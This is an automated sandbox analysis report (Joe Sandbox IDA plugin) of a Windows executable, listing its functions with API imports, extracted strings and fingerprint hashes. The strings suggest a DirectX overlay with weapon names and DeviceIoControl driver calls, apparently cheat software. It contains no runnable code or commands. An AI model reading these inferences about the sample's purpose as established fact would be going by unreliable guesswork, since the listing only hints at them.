??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF786613C8B

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: D@std@@@std@@U?$char_traits@$??5?$basic_istream@V01@$??1?$basic_ios@??1?$basic_istream@?setstate@?$basic_ios@Init@?$basic_streambuf@fclosememset
String ID:
API String ID: 1635463032-0
Opcode ID: 27c861ca4dfe52f32d94f1e49729f1f54d1c4d1f8ae6f47ba14cdae85894b0c6
Instruction ID: 28e18dc701cf480f84fef5b33c1333c0a2b2d3dfa1e8091b70dbaf9e6f0ef1d3
Opcode Fuzzy Hash: 27c861ca4dfe52f32d94f1e49729f1f54d1c4d1f8ae6f47ba14cdae85894b0c6
Instruction Fuzzy Hash: E991DF61728A87B3EF40EB54ED949AAA322FF80B45FE05132E54E46578DE2CDD4DCB10

Function 00007FF7865E6800 Relevance: 34.8, APIs: 23, Instructions: 282COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865E6850
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865E68F3
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865E6925
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865E6957
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865E6990
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865E69C2
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865E6A1E
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865E6A50
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865E6A82
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865E6AB4
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865E6AE6
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865E6B18
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865E6B4A
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865E6B88
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865E6BBA
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865E6BEC
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865E6C1E
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865E6C62
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865E6CA0
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865E6CD2
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7865E6CF4
fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7865E6D02
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865E6D34

Part of subcall function 00007FF7865FE9B0: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865FE9EB
Part of subcall function 00007FF7865FE9B0: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865FEA0C
Part of subcall function 00007FF7865FE9B0: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865FEA59
Part of subcall function 00007FF7865FE9B0: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865FEA89
Part of subcall function 00007FF7865FE9B0: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865FEAAE
Part of subcall function 00007FF7865FE9B0: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865FEAD3
Part of subcall function 00007FF7865FE9B0: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865FEAF4

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: free$__acrt_iob_funcfclose
String ID:
API String ID: 3697265371-0
Opcode ID: 09583983a69ba5d9f0c5cf5098e8dfe87a0fbfc5c25a7a641f75ebea4985b0ef
Instruction ID: 88ab6a08698aa45b0815823cc59f533510da3623f8cfa8e0743b4cbe6e14761c
Opcode Fuzzy Hash: 09583983a69ba5d9f0c5cf5098e8dfe87a0fbfc5c25a7a641f75ebea4985b0ef
Instruction Fuzzy Hash: 87E1DD35B0ABC1A6EF59AF50EA509B9B3A5FF44B80FA81135CA5D43350DF38B864C720

Function 00007FF7865F3B00 Relevance: 29.0, APIs: 23, Instructions: 240COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865F3B2B
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865F3B50
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865F3B75
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865F3B9A
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865F3BBF
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865F3BF1
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865F3C16
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865F3C3B
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865F3C6D
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865F3C92
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865F3CC4
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865F3CE9
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865F3D0E
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865F3D8A
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865F3DAF
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865F3DD4
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865F3DF9
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865F3E1E
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865F3E43
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865F3E68
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865F3E8D
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865F3EB2
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865F3ED7

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 791f1ca0f5953e676291c10da435f9cfd417d481e82fa6ce9a30f7bede50119b
Instruction ID: ddb67e9b29196001080c2530b11d5a01183c56ce801efcafdf026aaf22c97794
Opcode Fuzzy Hash: 791f1ca0f5953e676291c10da435f9cfd417d481e82fa6ce9a30f7bede50119b
Instruction Fuzzy Hash: 44B12431B0AA82A5FF45AF60DD50ABAA3A1FF45F41FA85535C90D87261DF2CAD04CB70

Function 00007FF7865FF050 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 175COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7865E2650: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865E2731

fseek.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7865FF0B6
ftell.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7865FF0C7
fseek.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7865FF0E1
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865FF107
fread.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7865FF127
fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7865FF135
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865FF150
fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7865FF17D
fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7865FF323

Strings

C:\Windows\Fonts\Impact.ttf, xrefs: 00007FF7865FF085
%s, %.0fpx, xrefs: 00007FF7865FF26C

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: fclose$fseekmalloc$freadfreeftell
String ID: %s, %.0fpx$C:\Windows\Fonts\Impact.ttf
API String ID: 3453272378-2114150515
Opcode ID: 4469056663079f1d276d31713565990429b6030ddcedc6baae0b7696b8c8dc9f
Instruction ID: 6e7cde0beee508d60aa0e8d119fcdae1423fd6f98d3f397895296d460d279634
Opcode Fuzzy Hash: 4469056663079f1d276d31713565990429b6030ddcedc6baae0b7696b8c8dc9f
Instruction Fuzzy Hash: 2591C521A08BC495F7129F69EC012FEB3B0FF98759F546224EE8912B64EF39D546CB10

Function 00007FF78661ABA0 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 215COMMON

Download Yara Rule

APIs

Direct3DCreate9Ex.D3D9 ref: 00007FF78661ABBD
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78661ABCC
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78661ACA6
QueryPerformanceFrequency.KERNEL32 ref: 00007FF78661AD01
QueryPerformanceCounter.KERNEL32 ref: 00007FF78661AD16
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF78661AEBC

Strings

imgui_impl_dx9, xrefs: 00007FF78661AE0A
imgui_impl_win32, xrefs: 00007FF78661AD2B
@, xrefs: 00007FF78661AC82
OTTO, xrefs: 00007FF78661AFBE, 00007FF78661AFE9

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: PerformanceQueryexit$CounterCreate9Direct3Frequencymalloc
String ID: @$OTTO$imgui_impl_dx9$imgui_impl_win32
API String ID: 2444153533-2332507762
Opcode ID: f21731b80b1b55b8835324764b18151ae1c52659f3b640e01066e02bb4a5bfed
Instruction ID: a27dc05380ca9ccb03ca96f0fc276b1b764109d4f489b1a8f6b64a57ce24a955
Opcode Fuzzy Hash: f21731b80b1b55b8835324764b18151ae1c52659f3b640e01066e02bb4a5bfed
Instruction Fuzzy Hash: 99D15A71A08BC1AAE311AF29EC043AAB7B5FF44749FA04234DA8807664DF7DE564CF10

Function 00007FF78661B080 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 147COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7866127C0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7866128B1

memchr.VCRUNTIME140 ref: 00007FF78661B125
memchr.VCRUNTIME140 ref: 00007FF78661B153
memchr.VCRUNTIME140 ref: 00007FF78661B183
memchr.VCRUNTIME140 ref: 00007FF78661B1B4
memchr.VCRUNTIME140 ref: 00007FF78661B1E8
memchr.VCRUNTIME140 ref: 00007FF78661B214
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF78661B290

Strings

Rifl, xrefs: 00007FF78661B190
Shotgun, xrefs: 00007FF78661B0C9
Snip, xrefs: 00007FF78661B1F2

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: memchr$_invalid_parameter_noinfo_noreturn
String ID: Rifl$Shotgun$Snip
API String ID: 876120417-932107277
Opcode ID: 8ae58c139af3e3eb5fb68fb6d39d56429e735c77dfbc0a0c100c144b57e36bba
Instruction ID: c390c614fce72a02c299564541b856834e87d535f64eaeedf210f11c627beccb
Opcode Fuzzy Hash: 8ae58c139af3e3eb5fb68fb6d39d56429e735c77dfbc0a0c100c144b57e36bba
Instruction Fuzzy Hash: B351C661B186C2A1EA54AB21DC052BBA393BB45760FE84331D66D02BD5DF3CED46CB10

Function 00007FF7866127C0 Relevance: 13.8, APIs: 9, Instructions: 344COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF78661E8C0: memcpy.VCRUNTIME140(?,?,?,?,00007FF7866118E5), ref: 00007FF78661E8F8

Part of subcall function 00007FF78662A090: DeviceIoControl.KERNEL32 ref: 00007FF78662A149

DeviceIoControl.KERNEL32 ref: 00007FF786612963

Part of subcall function 00007FF78661E8C0: memcpy.VCRUNTIME140(?,?,?,?,00007FF7866118E5), ref: 00007FF78661E998

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7866128B1
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786612ACC
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786612B0D
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786612B5E
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786612B9E
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786612BFA
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786612C77
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF786612CC3

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$ControlDevicememcpy
String ID:
API String ID: 2471032920-0
Opcode ID: 80f8afb178707850a606b64a4a6648f5eb7cb32af5f9546180562182a1725c04
Instruction ID: 0f648fccee3d7a0dd0c5deb3d07568df07dbe44afef882737846eafd8cf0e998
Opcode Fuzzy Hash: 80f8afb178707850a606b64a4a6648f5eb7cb32af5f9546180562182a1725c04
Instruction Fuzzy Hash: 33E1F9A2F04A82A5FB00EB75D8413AE6762FB457A4FA05631DA6C17BD9DF38D8C0C750

Function 00007FF7865FEC70 Relevance: 13.7, APIs: 8, Strings: 1, Instructions: 161COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865FECA8
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865FED5C
memcpy.VCRUNTIME140 ref: 00007FF7865FED7C
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865FED9C
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865FEE6A
memcpy.VCRUNTIME140 ref: 00007FF7865FEE81
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865FEEA8
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865FEEC9

Strings

?, xrefs: 00007FF7865FECEA

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: freemalloc$memcpy
String ID: ?
API String ID: 3519880569-1684325040
Opcode ID: afa3aa3dba3c314bd04bc67ca81b87aa2305902709e09113c4d8cab768f10ae9
Instruction ID: 4613d274313c8636d297948a7506797bb92b52712b2d9fd7a4ae226bad54c985
Opcode Fuzzy Hash: afa3aa3dba3c314bd04bc67ca81b87aa2305902709e09113c4d8cab768f10ae9
Instruction Fuzzy Hash: FB71A132A05B81A6EB55DF14E940279B364FB88B44F989239CF8D43751DF38F995C710

Function 00007FF7865E2840 Relevance: 13.6, APIs: 9, Instructions: 76COMMON

Download Yara Rule

APIs

fseek.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7865E288D
ftell.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7865E289E
fseek.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7865E28B8
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865E28DA
fread.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7865E28F6
fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7865E2904
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865E291F
fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7865E2927
fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7865E293D

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: fclose$fseek$freadfreeftellmalloc
String ID:
API String ID: 3246642831-0
Opcode ID: 33f0608f3dd53fe92e6a27d8e228b8171e8e6b079c646f90b21fb53d5b308df6
Instruction ID: f444b395a331d3e8d955805b9a122e87b6ff415bcc7f1fe87f8c845a5540fbc9
Opcode Fuzzy Hash: 33f0608f3dd53fe92e6a27d8e228b8171e8e6b079c646f90b21fb53d5b308df6
Instruction Fuzzy Hash: B0316425B0978291FE856B56ED4133AB2A1FF48F90FA82030CD4E46758DE3CEC85CB20

Function 00007FF7865FBA00 Relevance: 11.4, APIs: 9, Instructions: 130COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00007FF7865E12AE), ref: 00007FF7865FBA31
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00007FF7865E12AE), ref: 00007FF7865FBA5A
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00007FF7865E12AE), ref: 00007FF7865FBA83
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00007FF7865E12AE), ref: 00007FF7865FBAB8
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00007FF7865E12AE), ref: 00007FF7865FBAE1
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00007FF7865E12AE), ref: 00007FF7865FBB10
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865FBB94
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865FBBC7
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865FBC1C

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 44b497ab1427ec3993459d5f7e8633dfd8148f3b61f90d66b93ff010372033f1
Instruction ID: 0ba2171583b547b71ccf3f29edd8b45a915f0521b348b0be7e3e9fe0469d46a4
Opcode Fuzzy Hash: 44b497ab1427ec3993459d5f7e8633dfd8148f3b61f90d66b93ff010372033f1
Instruction Fuzzy Hash: 7F51283660AB81D6EB15AF11E84062AB3E6FF44F44FA84A35CE8D47714DF38E890C720

Function 00007FF786628E90 Relevance: 10.7, APIs: 7, Instructions: 178COMMON

Download Yara Rule

APIs

fgetc.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF786628F42

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: fgetc
String ID:
API String ID: 2807381905-0
Opcode ID: b6fda17f9f22a2a71ce80222b3e9a6b080b9117e8914581f8c1998a0c95ca2d5
Instruction ID: 4fb59fc554134a3a25151c8df68aab0dc83181d76ccab8d6d815bfe558d3c578
Opcode Fuzzy Hash: b6fda17f9f22a2a71ce80222b3e9a6b080b9117e8914581f8c1998a0c95ca2d5
Instruction Fuzzy Hash: BE91D032B14A80E9EB009F76C8442AD77B6F788768FA40236DE5D57B94DF38D894C710

Function 00007FF7865F23A0 Relevance: 10.7, APIs: 5, Strings: 2, Instructions: 155COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865F23EE
memcpy.VCRUNTIME140 ref: 00007FF7865F2404
memchr.VCRUNTIME140 ref: 00007FF7865F24A5
memchr.VCRUNTIME140 ref: 00007FF7865F24C1
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7865F25AE

Strings

], xrefs: 00007FF7865F2482
Window, xrefs: 00007FF7865F24DA

Memory Dump Source

Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true

Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: memchr$freemallocmemcpy
String ID: Window$]
